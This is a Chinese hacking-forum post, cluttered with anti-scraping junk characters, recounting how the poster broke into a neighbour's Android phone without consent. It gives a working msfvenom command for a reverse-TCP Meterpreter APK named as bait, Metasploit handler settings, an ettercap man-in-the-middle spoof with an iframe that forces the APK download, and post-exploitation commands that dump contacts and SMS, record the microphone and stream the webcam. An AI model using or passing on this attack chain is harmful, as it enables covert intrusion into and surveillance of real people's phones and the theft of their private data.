找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1446|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& }- V) X! Y/ c 五、msf+ettercap入侵邻居安卓手机 % v9 s1 O8 s7 j

! @2 V D1 y+ W2 I

9 a5 y- r+ j' j+ }* o 首先启动msf % S) B6 E0 d0 a" u: L4 c" }

: o6 @; I4 |' X* V% O1 ?

2 s6 l. P, M6 Y( Q4 d 先用kali生成一个安卓木马,如下命令: / P' Q+ g+ r, ]( }6 a4 E3 L

5 ], W" ]! L5 m1 W3 o0 O' N! l

1 Y& w8 J- G6 j7 b" z1 ?( j2 W Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk % v9 }( e% k# z. D6 c# M* d* C# j1 e

' z+ a/ {9 Y8 P1 b5 W2 S+ N

0 h( @ X, d/ F* c% B) V 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 2 X# U4 b0 O, Z" E" o8 k

& q8 T6 E# R2 R( S) B0 ?& m! i

4 O2 S }$ q" u; o7 ~& \ 然后进入msf + a8 p! @3 c C2 j' _, u

R* N* i$ [9 n2 Y# \

+ l9 q! t6 A P" e; m4 F1 a, w9 ] use exploit/multi/handler 4 y2 F# G6 A0 o; }

8 e- }6 A+ ^8 y6 \* }- ?- T6 Z

6 p0 P) G* O' z* L set payload android/meterpreter/reverse_tcp ; u" b7 q# X$ L

# t: ^& C w! t3 v3 e3 f$ t

7 X1 g- u% V2 _) ^' K set LHOST 192.168.0.109 //ipkailiip 8 l) e9 w0 Q7 F

' J+ O: n* B: b- B6 Y$ v; L

3 X8 {7 C) s. T% W6 v1 B set LPORT 44444 //端口一定要与前面生成的木马的端口一致 # j) K' I; p( c+ W

$ [' `! S7 \/ f

' d0 R: @2 U! ?( f4 t( S9 F+ g Exploit - c [$ G2 P: r6 M# m* Q. ]! b; }

+ Z/ @1 l. M. ?/ q3 Y: g

; u: H' s! Q3 }   9 T- V. T: J/ \8 r3 d

2 g; `' G- |! k( s* S' y

7 H( Q7 c" R# i0 r0 M- |! W0 d 下面我们开启ettercap -G $ D+ @! H* g. N0 x" i% r

0 d$ O8 O3 z& ]4 Z# B- [

1 C* g. O5 ]$ X( I 我物理IP " n8 }# z4 U0 j0 @ B/ s8 S4 ?

' g# B/ O& v1 q' e

' n9 g0 u0 {% w   4 t/ M& B7 I) O! A

1 I6 s) I1 D. e$ C9 L

; y% d9 @/ C1 g; u" H& K5 l 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, % O& P! D! N9 h, d7 h. u

G2 g5 a: V# C$ v% w5 F

/ K* w2 L1 ~' m* \4 S( j+ Y4 i# x 下面我们来设置一下 V7 x& ^! E4 `$ J( [5 E

* K% x+ a; Y1 T0 L- {

4 r- a# u! o* ?* S   5 g7 I9 Q2 N9 G# ?# u

" a( F5 f- H# v. ]% p& O5 O

+ ~$ t5 F" n5 b# \ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 q# y, e* e d) B+ [: E- B

6 `3 |% K: j" B8 p- d

6 @, v& B1 U/ d- b1 N: h   5 m$ R/ r& `# \, j& W/ r o+ {

, m7 ]7 A5 r; [

/ L8 J0 K* P( L5 S& D0 [   3 K! i0 ?1 A; n4 p( J0 {: q* u

1 t6 ]' q( S. B+ k2 l& p/ R

& [7 P& S' M2 ^   4 \4 R+ ]3 \7 ^& N. ~' Z5 H2 x

( J( ]# ] F7 B5 A# R% X' B8 N

+ ^" J5 r5 `$ n, P V+ n   & l& i# o; Q$ k+ n' U

; L7 y+ y; R, a

: O3 L) b( k+ |! p& Q   7 ^6 [2 s* L% n I2 C

9 B/ T2 G4 o3 R/ ]

5 z2 X0 g# r4 p U6 g! ? a2 V   N k' A5 L& P* B9 ^

3 e! [! k) z( ^, y' A

' R+ Z3 A# e" s0 p   2 I( P" N7 o/ J8 j0 w, }* K

8 e( j: l2 p M* C4 `* I" x

, _/ X: b) e, x6 A# }   9 o- U& R3 Y& ]% s! L

1 r4 M, ^; X4 h% s; }; S. V- h

. ~) P& b+ c( M) n   $ q4 ^: ]% w4 z, n8 \

1 ?! e8 |" W' A. M- I

% o) x, E; j. f4 r9 a6 c, H   & y2 ~+ i; Q/ o9 N( B5 S

% }/ N7 G F, r6 ~- R

0 r3 ~& ?8 r. {1 a- d   5 Y. c9 V6 e9 ^- H0 {

% L0 o+ g9 E- n- R k

M- ]8 o, `7 v, ~7 h   3 ?3 X9 [* k, n0 }; l1 T) u

1 d4 E& T1 [8 K2 T% f% }

; |% n9 N$ {1 u+ _$ H   . a3 h& p9 y5 L% r$ I+ J$ q& h6 W

9 e% z8 r8 a h0 b& j# c

7 U* B6 d/ N1 l" B 下面我们开始攻击 1 q3 u: Z9 q9 X. d

) p- |" s; E/ I7 J

$ K5 l' i1 j, j ~( Y8 \. Q   % ?8 ]& O) a& ?+ J5 ~8 i

1 b( l: V7 Y, P! x' f$ H4 ?* I" J

5 x3 s4 g. d& \; H1 A1 [7 k   4 ]7 `9 i$ p/ C( n) c7 B

; O3 ~8 p: a4 ?8 q/ h0 d

/ l2 B$ Z- m0 {0 h% A6 W3 _7 n   * M L) _7 Q& n/ t$ m7 K& q

2 B, Y: G- z; B' |- I/ ~1 R4 i

: F8 f8 ^0 W! N1 \ ^3 V   ! F% @8 ^& t; i4 F+ c! }

A) k4 o4 ]9 w7 ~5 y2 G3 Y/ w

/ p7 O9 b, m" C# y8 ^   6 ^6 E! o% h0 h2 G3 z$ L

1 M/ I7 y; }/ K, f

3 P( t' |. P, u3 I' b# {, y 大概过了5分钟多,发现反弹成功了 / Y) Y$ u D5 e) d* L2 Z

' x+ T" X) `, S7 v& }$ u. Z

. s3 N8 F: L9 M   " G3 I5 Z8 o5 K: D3 T: z

7 Y# t/ B d" S

2 { k( ]( h8 S! n   6 K- C8 w# l5 U6 Z

! b6 R4 i, S: a9 `/ r, @1 |9 V

9 [ h3 j' Y% n" i   ) l3 {$ l1 k' Q- b! ~4 s% o

$ D h* P( Y: T5 Q- Y& G8 Q

9 W" v* X9 O6 j/ `) J! \7 n; d   ) a+ t0 S0 j' n7 R( k2 N1 c

' Z7 [+ \. `0 D! B2 C. p( X8 C

7 Q- R& I, D+ S- |% k: q1 K   1 E1 y# w+ z# A- p: c) c6 f/ w( m

- B1 \5 E* n- i9 l8 J3 ~' i

B5 b/ q* [* V8 {- J# W   + g2 Q! v* ^; ]' w- T, \ e8 U, ?# C

$ e w( R, i8 w' q2 _

# H# [! j( M3 I9 A! i   r8 A5 \% H( L9 K% {

6 z/ N. Y: H1 Z# J B& @# n9 H/ d

3 p7 c, H0 Z/ }2 j' @ 执行命令 & W1 f$ w; c: o

2 U( m* q; U2 |6 d( E+ r8 Y

/ D0 |) k! a4 M8 W. v3 ]' d   9 X+ Y7 V! X2 T% b' ^/ H

/ i0 ?" @) O! [, ?* S

) j: Q: y; U. ]7 N8 G dump_contacts    --》这个是导出电话 5 Z; T% l# d7 N% P0 h' c* u

+ t l8 F2 I, e! h! U# P# S: f) G2 @

, S) u# R. K. Y+ `; h! \) ^ dump_sms --》这个是导出信息 0 j6 R9 |/ `! B8 w+ O

% J. F3 L3 [6 i( F

' N+ x6 N/ t1 W' _) Y1 m/ @ record_mic     Record audio from the default microphone for X seconds 0 ^7 }# L) Y* Z

8 v8 ~/ }! q2 O$ k& e

% i1 m% ^/ s+ `5 O1 b: p2 k/ ]% x; A     webcam_chat    Start a video chat ; s) g5 ?0 t5 n; v7 X2 B* e6 u

! d- ~' I! `1 Q) ~8 z0 ^+ M

1 p/ \8 | ^4 D     webcam_list    List webcams 0 A8 N; c- b% D* T. h% a; l! {) K

- f7 V! `0 f4 \) r' B1 G9 Q. |

1 Q" t v# j' |7 ~ f {3 T     webcam_snap    Take a snapshot from the specified webcam Q2 ]8 O1 Z' v8 A

1 K0 R& t4 M- h' B. q

: X2 U. ]: V2 @! Q4 j webcam_stream  lay a video stream from the specified webcam 2 B) P/ L2 Q' @

`8 {8 k% }" l

) q k# p, F, J   / [0 G, b, M9 X- b" Y7 B

2 I' x- d6 T* l1 ^

8 t1 _: L: J! u7 N9 ?1 @# P   0 w! v' s. g a0 T: n

* D! \' A5 Y3 Q( j

, k% i% B. m% F4 A! r" c' }; t 我们打开看一下电话薄, ' y; w7 y, e7 M' `: V

$ R9 S7 M. S$ ^ d: I1 t

; ~" Z: r8 y; _0 N3 U9 F   % q5 L( ?3 A B6 a

, U4 B+ J/ F' V' [ }

& v5 e, a6 M2 z7 A" c. }! e   0 m4 o {: N$ l+ g* Y5 h

+ v9 s: f' l, O: M

+ j! d' t/ P D2 z   ' H7 G8 n+ n+ \2 b

; A7 K5 P% ? F0 @2 q

5 ?' u" G6 }4 x8 } \6 x% s) H   $ o& w. e! n# c* @, G5 c

' k! }1 x! k g8 i

! D: t0 j: T( S- o/ u0 c4 l& S* j   5 F5 s `( c: u+ u

4 ^- [! g" a7 R; Y, K

1 j/ [' | F" m- v7 H) D   , K1 [+ E, `; L0 [% e1 x) l

. Z% z5 f9 L2 [7 @7 V9 L0 T

0 o t5 v4 ]6 z; A% Q6 ? 我们同时欺骗成DroidJack木马,使用方法如图: ' C0 P/ w! p' H( h

1 K: R* R3 e& L( }7 E8 _# n

$ ?4 l/ D0 x; p! v& G   u! O% u, {% p( q% v- D7 e* j

( K, p4 U# c; L) I- N, O' [4 X

# D% u+ Z6 [- W$ E7 l6 h _   8 B' T0 g" a" L, u8 r) C

; ~/ q7 ], W- r; e' o

. X5 y$ }( P0 Y6 n/ J   # X) B% G& D Z2 a$ f0 e+ b

5 S; l$ ~% [# ~2 j& m5 `

' o' }9 a' k, }, ?0 K/ J 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 " \0 }/ J# P% k$ t0 c* v6 a$ A: x

: F2 S* s; H9 [; Q

8 P( ^9 K7 g; h, W0 G   , M. L4 U! V T" M5 k

; s$ i& {2 K3 `1 z, k/ V+ Y& q. \2 s

( m+ b7 A# ^" v1 Y" E* |2 y, s   7 G0 V5 M# a6 n3 j5 S# k0 I% y

7 s5 M! U, C4 ]. G" V: {

" n! e% _9 @# ^# ?, w3 Q   ; N" g! ^8 L3 y0 |- p

! R; d! R! ]1 U$ S) ]) B

5 O8 A1 }5 ] K6 @ k! A " U! e; K) L' Q) @* w- s V

J6 V) z' |0 Q1 A; `' K7 a" O

2 m m! R: n1 E8 y- Z
/ ^4 S' C& v& r1 D

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表